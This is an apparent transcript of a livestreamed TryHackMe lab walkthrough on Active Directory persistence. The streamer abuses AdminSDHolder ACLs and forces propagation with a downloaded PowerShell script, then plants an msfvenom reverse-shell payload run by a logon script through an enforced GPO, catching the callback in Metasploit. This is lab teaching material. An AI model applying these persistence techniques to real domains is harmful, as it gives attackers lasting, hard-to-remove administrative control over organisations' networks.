sure to enable advanced features. View advanced features. We can find the admin SD holder group domain. View advanced features. Worked very, very well. We go with this domain controller. Hey-o! Okay. So, we finally got to there. That's not what you guys want us to do. Go down to system. We still need to somehow view advanced features. View advanced features. All right, that's showing up now. Okay. Look at that. We are getting somewhere. Oh, fuck yeah. Swords everywhere. Swords for everybody. This is going to be like Game of Thrones pretty soon. We got system. Admin SD holder. Right? Is that like where we're supposed to go? Admin SD holder. And then we're going to navigate security group. Right click properties. Security. Right click properties. Security. And we should just allow, right? Just fucking everyone, right? I want to allow everybody. I don't care who they are. Alright, I don't remember who I even logged in as. I should just log Matthew Williams now. The guy will be super confused. Murphy gets this point. Who did I log in as? My user isn't even on here. Add. What was her name? Claire? Chloe. Close enough. Chloe. Check names. Chloe Potter, right? You fucker. Administrator. Boom, boom. Okay. Holy jeez Louise. I thought there was just going to be one Chloe. This organization hired a lot of Chloes. I've actually never met a Chloe, I don't think. Probably because they're all working there at za.tryhackme.loc. Okay, so now she has all the rights in the world, right? She has every right you possibly have. Cool. Now we just need to wait 60 minutes. However, since we do not like to wait, let's kick off the process manually using PowerShell, ctools, invoke, AD/SD propagation. Can we just do a GP update / force? Can we just do that here? Or would that not work for that guy like right there? Then I think about Chloe already has admin rights, doesn't she? Let's find out. I mean, we can do all this. We can see, you know, obviously we added everything for that group, so we did it. But I feel like she already has admin rights from all the other steps that we went through so far. Yeah, she already has admin rights, so we can't really test this theory unless we get literally another user. Which, I mean, we can. Yeah, let's grab another one. Let's get some more credentials. Because Grace Clark, she already has admin rights too. Chloe Potter, we already have her. How did we get the same? There's 400 people on this thing. Lewis Cole, we got him. Okay, we're going to do Lewis Cole. All right, let's go ahead and put Lewis Cole in here. And we'll try GP update force. For some reason I just feel like that. Maybe it won't work for this guy right here, but we'll try. Properties, security, add, Control V, check names, administrator. That password. Okay. Lewis Cole. Yep. Okay. Okay. Full control. Apply. Okay. GP update / force. We'll try that first. And then we'll go from there. Let's go ahead and log in as him. Password, exclamation point. Exit out here. Let's try to do that again. This time with Lewis Cole. We'll do password, exclamation point. And let's see if he can LS into it now. No, he cannot. Okay, so access is denied. Okay. That is okay. Let's go ahead and grab that file. So it is called, that file is called invoke ADSD propagation. I feel like I might already have that. Let's find out. No, we do not. So let's go ahead and download that like real quick off of GitHub. We'll grab that. We'll upload it on the machine ourselves. I feel like this won't already be on our machine, so you should probably do it yourself with IEX IWR. And we'll use it like that. Let's go ahead and go to raw. We'll do a wget for it. That should be it, like right there. Use basic parseed, HTTP. I gotta grab my IP address. .1050.92.9. Invoke propagation.ps1. And let's go ahead and do that, because I think we're on the domain controller, right? Yes, we are. Okay, cool. So let's go ahead and do a, how do we run that file? Cat invoke propagation. Run it with a function, invoke ADSD propagation. Okay. Let's go ahead and do that. And let's try to do this again. Might take a couple minutes, or we might have to log out and log back in. Let's try to log out, we'll log back in. Whoops. Let's run it again. We don't have to put anything behind it, right? Well, usually it would say like, you're all jacked up, dude, try again. But let's just make sure. Yep, okay, cool. So we don't have to put anything behind it. Oh, okay, here we go. As you can see, our low privilege user has full control over the group. You can verify this with this will continue to propagate by removing a user for security permissions and rewriting PowerShell script. So we can actually see if he actually got in there, huh? Where do they go for that? Domain admins? Domain controllers, computers, admins. Underneath here? No. Where is domain admins at? I want groups. I want users. Groups. I haven't seen domain admins groups even in here. Well, we put them in there. Did that. Full control. Okay, let's go ahead and log back in as him. Exclamation point. And we'll try that again. PowerShell. PowerShell. There we go. PowerShell. There we go. And hey, thanks a lot for the follow, Jacobic. Thank you very much. And we'll do a LS again on there. And we ain't got shit. So, it's not really working very well now, is it? Once done, give it a minute and then review the security permissions to protect a group such as domain admin's group. You can use the search command to find this group. Okay. Domain admins already in here? Enterprise admins, they should be. Domain admins are in here, okay. Okay. What is the search? There's a search function in this thing? Never knew that. Find. Domain admins? Oh god, it broke. That was a horrible idea to try to find. Bob? Alright. Oh, well, he wants a 5-minute break. Give me 1 second. And we will do that. Entire directory, domain admins. Domain admins group. Yep, that one like right there. Does he actually belong to it? No, he doesn't. Nobody does. Alright, give me a second. I'll be right back. Group. It looks like there's... So, let's see here. What do we got here? We did that. We gave him full control. See, our low privilege user has full control over the group. We can verify that this will continue to propagate by removing the user security permissions and rewriting the PowerShell script. But he's not. Once done, give it a minute. Then review the security permissions of protected groups such as domain admin's group. Domain admins. Let's do that. See if he's in there now. Oh crap. The AD group member. Alright, let's see. Grace Clark's in there. I'm there. Tim Taylor. Matthew Williams. So our guy still is not in there yet. Lewis Cole is still not in that group yet. So, don't know if we're just going to have to wait an hour or what. But, I mean, I'm not going to wait an hour. Maybe we need to run that command down on another machine. Or on the THM work machine, which I don't really understand why we would. Because we're in the domain control like right now. So, I know I'm not going to wait an hour for that to actually happen. But we did put them in there. Security. He's in there. There's Lewis Kolick right there. Domain admins are also in there. Alright, I ain't gonna wait an hour for that. What AD groups ACLs are used as a template for ACLs of all protected groups? What AD groups ACLs are used for? As a template for all ACLs protected groups. AD admin SD holder. Or AD service updates the ACLs of all protected groups to match that of the template. kind of a boring stream, sorry. This one's a little more boring than the other ones. ACL permission allows the user to perform any object on the AD object. Full privilege? What are you saying? R-I-V-I-L-E. Nope. Full control. It's not full privilege, full control. That's why. Persistence through GPOs. Should just go down and answer the questions. It's probably going to take an hour. Hey, thanks a lot for the follow, T.O. Mick. If I were you guys, I would not be following right now. But thanks a lot. At this point, you should be familiar with GPOs based on different numeration attack. Group policy management AD controls a central mechanism to manage the local policy configuration of all domain joint machines. This includes configurations such as membership to restricted groups, firewall, and AV configuration, and which scripts should be executed upon startup. So are we going to execute a script upon startup? All right. Let's go ahead and make an MSF Venom file. Our host, we're not going to make it persistent AD. I have to figure I'll trust that. I know it will work, but I don't trust it. So we're just going to do this. And we're going to make that for carrot.exe. Carrot shell.exe. All right, let's go ahead and make that guy right there. Make sure to add your username, okay? So make sure to add your username, the binary name to avoid overwriting the shells of other users. Windows allows us to execute Bash or PowerShell scripts through the login GPO. Bash scripts are often more stable than PowerShell scripts, so let's create one that will copy our executable to the host and execute it. We all know that Bash scripts are more stable than PowerShell scripts, because if you have ever done any of the networks on TryHackMe where a PowerShell script supposed to run, usually doesn't. Create the following script. Go whatever script.bat on the attack box. Create the following script called why would we create that .bat file when we're creating an executable file? Make sure to add your username to the binary name to avoid overwriting. Okay. Bash PowerShell scripts through the login GPO. Bash scripts are often more stable than PowerShell scripts, so let's create one that will copy our executable to the host and execute it once a user authenticates. Create the following script called... Okay, I see. Okay. So like, what are you talking about? Okay, so let's echo carrot.bat. Carrot script.bat. I don't know why I just did that. We want to echo all of that into carrot script .bat. Don't we have to put it somewhere also for it to run on startup in Windows? I feel like we also have to put it in a certain location for it to actually run on startup. Within Windows. that it? I don't know what we just got. Type caret script.bat. Let's see if that actually went through. Okay, yeah, that looks good. Okay, good. Okay, cool. So this thing is going to copy .try-happy.loc, sysvol .try-happy.loc, scripts, caret shell.exe. So we probably have to put it in there. And the C temp caret shell.exe and timeout and caret shell.exe. So we probably have to actually put wget http our script in there. 1050 50.92.9 slash caret shell.exe. Don't know why I just did it like that. Attack out file caret shell.exe. And then let's copy that into here. Caret shell into there. Okay. Now if we cd or dir that guy, we should see caret shell in there. I feel like we need that guy in there for it to be able to copy it out of there. All right, cool. So there we go. All right. You see the script executes 3 commands chained together with an end. The script will copy the local machine, then wait 20 seconds before finally executing the binary. We use our SCP and our administrator credentials to copy both scripts as sysvol. Yeah, we already did that. Finally, let's start our MSF listener. Okay. MSF console. Let's go and set payload to that. Set our L host, set our L port. I like whenever YouTube suggests a video to me and it's my video and I don't have like different accounts. I don't understand that. I get very, very confused. Alright. Use exploit multi-handler. Set the payload to that. Set our L host to that. Set our L port. I believe it was 4445. I believe they picked right. Yeah, 4445. Okay. Cool. So we're there now. With our prep now complete, we can finally create the GPO that will execute it. You'll need RDP and THM work 1, which we already are. And we already had that run as working. Alright, and we actually already, I think, have pretty much everything up and running, ready to go for this guy, like right here. So console root, we could technically write our contents to default domain policy, which should propagate to all AD objects. Okay? Technically do a lot of things. Default domain policy. Only technically right. Okay, we will write our GPO that will be applied to all admins. So right click on admins OU and select GPO in this. Okay, we'll do that then. We'll do that. Right click. Create GPO. Yep. New. No, already in the right domain. We're in admins. And all we want to do is create a GPO now. I'm having more trouble doing this stuff than I do in real life doing it. That's what's funny. I'm MC. All we need to do now is create a GPO. I remove snapping. That guy. Add. Hey, thanks a lot for the follow, Murky Bab. Okay, so let's view or action or what is it? Did we have to change the main controller last time? The main controller. Admins, we should be able to create a GPO in here. Why can we not create a GPO? Control. This is not, it's not that difficult to create a group policy. What the fuck is going on? Action, view. It's really not that difficult to create a group policy. Okay, let's go. We're going to get out of this guy. Going to group policy management. Yeah, just say do that. Create a GPO in this domain and link it here. New GPO. Caret GPO. Don't know how the hell they're doing that in the console, but whatever. Right, click on the new policy, go enforced. Caret GPO. Okay. Let's enforce it. Enforced. From here, we have to actually say what it does. Okay. This will ensure that your policy will apply even if there's conflicting policy. This will also help to ensure GPO takes precedence even if blue team has written policy that removes our changes. Let's get back to our group policy management editor under user configurations. How to save what I'm talking about? Okay, so under user configuration, expand policy. Now it's different. Expand policies, Windows settings. Yeah. Okay, so we're going again. I'm sorry. Should be able to click on our GPO now. I hate GPOs. Okay. Hold up. Why are we not seeing? Yeah, we have to get over to a totally different thing. It's not going to be over here for a group policy management editor. We get to This is local though. This isn't for the domain. User configuration, boom. Expand, what again? Expand policies, Windows settings. Windows settings. Policy-based settings. This is for local though. This isn't for the entire domain. Are we supposed to be on the domain controller for this? I don't know. Whatever. Okay. Select scripts, log on, log off. Okay, so policy-based or scripts, log on, log off. Okay. Log on properties, select scripts tab, click add browse. This is such a shit show. Right click, go to properties, select scripts, then tab. Okay. Properties. Yeah, I just took one, dude. I literally just took one. Yeah, no, we gotta go into group policy management. It never said that. Then it never told us to actually go into the group policy editor, but I'm pretty sure that the group policy editor, pretty sure we're supposed to be on domain controller for this and not on just the regular machine. I'm pretty sure. Because he's definitely not on a local group policy management. It's just every single time it's like, if you try to just walk down it, you're never going to get it. Let's navigate to where we stored it. We stored it into za.tryhackme.loc. Tryhackme.loc. Sysvol za.tryhackme.loc scripts. Probably can't get there. Yeah. Can't open this file location. Yeah, that's kind of what I figured was going to happen because we're a fucking user and not an administrator. Oh, it slashed the wrong way? Hopefully. Hopefully that's what's wrong. Hopefully. Okay, thank God. Sysvol, thank you. Carrot shell. Okay. There's that. But this is still for a local. Do we actually move our bat file in there? I think our bat file is still sitting wherever, isn't it? Yep, so we still have to copy our bat file over there too. Copy carrot script.bat over into here. All right, there we go. There's that. So we just still need to add one, and we need that bat file over there also. za.tryhackme.loc. Sysvol tryhackme.loc scripts. The bat file. There we go. Okay. Abdullah, thanks a lot for the follow. There's that. Apply. Should have to apply it. Okay. Select the batch file. Okay. Now this one shows that every time one of your administrators tier 201 logs into any machine, we get a callback. No, because we put it in a local group policy management editor. So I don't think that's actually going to be the case. If we log into our local machine with it, maybe. But I don't think that's going to be the case for a remote machine, for any other machine. Let's go ahead and log out, or let's actually make sure everything's okay and closed and all that good stuff. Okay. Exit. Exit. No. I'm pretty sure we're supposed to do this on domain controller, not on THM work 1. And let's log out of here. This one, I don't really like this one. The Persisting AD, I'm not really a big fan of it. Especially since it says to log into a tier whatever account, tier 1 administrator account. We don't have one of those. So, yeah, we don't have a tier 1 administrator account. We have an administrator. We can just log in with him. We'll try to log back in this machine with administrator, see if that works. Then we'll go to another machine from there. Yeah, we have an administrator account. Let's see if we get a call back or if we log into him. I'm going to go with no. Might take a minute to run. Oh, we got a call back from him. Okay. Or we're getting a call back. It sends it back to us. We'll see if we actually get into it. I don't really care. We got a call back. That's amazingly enough. Okay, so we get a call back from him. That's cool. Now let's try another one, which I don't think is going to work because we put it on a local one. So let's grab another machine here. Any machine, really. 10.293.202. Let's try that. If it does work, awesome. Freaking sweet. Happy. I just don't see it working. That worked good. That worked out really, really well for us. So I'll try Happy Now Loc. We'll see what happens here. We'll go with it's not. We'll see if it even logs in. How about that? This thing doesn't have RDP. Or is it 10? Is it 10.200? Am I doing it? 93. Oh, 202. 202. Okay. Yeah, 10.293.202. Okay, so let's try 248. Let's do administrator. We're going no. Nope, because we put it on a local group policy. Wasn't on a domain group policy. Because we were not on the domain controller. So, alright. Well, we put on domain controller, it'd be good. Let's see here. Does it tell us to go into domain controller at all at any time? Or does it tell us, I think it actually tells us to stay on that one, doesn't it? That's already SCP'd over. That's it. Now to perfectly file create the GPO will execute, you will need an RDP in the THM work 1. And use run as window, running as administrator for the next steps. We already had that. Okay. Let me see something real quick. What was that? I just want to see something real quick. Maybe we just put it in the wrong spot. I hope we didn't, but what's the work one? 248? Okay, let's just try to get back into 248. Wait, was that 93, 248? We should have got callback then with 93, 248. Where we did that again, where we logged back in again, we should have actually got callback. We did not, but we should have. Okay, that's enough for me for today. It's enough try-acme walkthroughs for me for today. What's up, Boss Raid? How you doing? I would not have come back. I would have just stayed gone, in all honesty. So, YMC snapping can be used to manage GPOs. Group policy management, is that what you're talking about? What sub-GPO is used to grant users and group access to local groups on the host that the GPO applies to? Sub-GPO is used to grant users and groups access. Oh, we have been great. It's been like 4 hours of hell. Come on, dude. What sub-GPO is used to grant users and groups access to local groups on the host that the GPO applies to local groups on the host that the GPO applies to, on the host. What subgroup? Domains. Actually, work on to do this for GPOs into the admin's OU, which will allow us to get a shell on every. Yeah, but it's 2 words. What's some pretty like admin OU or some of that? What's have is used to modify the security permissions that users and groups have on the GPO. Like advanced? I forget that. I don't remember what the hell the tab's called. You just click on it. Let's Google it. What does Google say? Hey, thanks a lot for the follow, Chronox. What does Google say? Delegate permissions? Is that what it's talking about? No. What did you say? Before authenticated users? You think authenticated users? Nope. What sub-GPO is used to grant users and groups access to local groups on the host that the GPO applies to? Group Policy Management AD. Local policy configuration of all domains. This includes configurations such as membership to restricted groups firewall. Nobody in here knows the answer. That's my favorite part. I can't even understand. There's so many groups in here. I don't even understand the question. What's sub-GPO? This is like a security plus question. That's what this is. This is a CompTIA question. What sub-GPO is used to grant users and groups access to local groups on the host that the GPO applies to? And there's no other thing in here that says sub-GPO. It's not console root. It's not long enough. It's not default domain policy, which would run every single time. I think that's the user for Windows Defender. Default account. Not long enough. Restricted group? Not restricted group membership, just restricted group? Okay. What tab is used to modify the security permissions that users and groups have on the GPO? I forget what tab it is. Security? That's not long enough. Okay. Thank God. Thank God. That was miserable. Dude, that was this whole time. That was this whole thing was that. Except for, I think, the pass the ticket. And, yeah, pass the ticket and the persistent to credentials. After that, it was just downhill from there. That was the whole thing. That was 3 hours and 48 minutes of hell. Like right there. All right.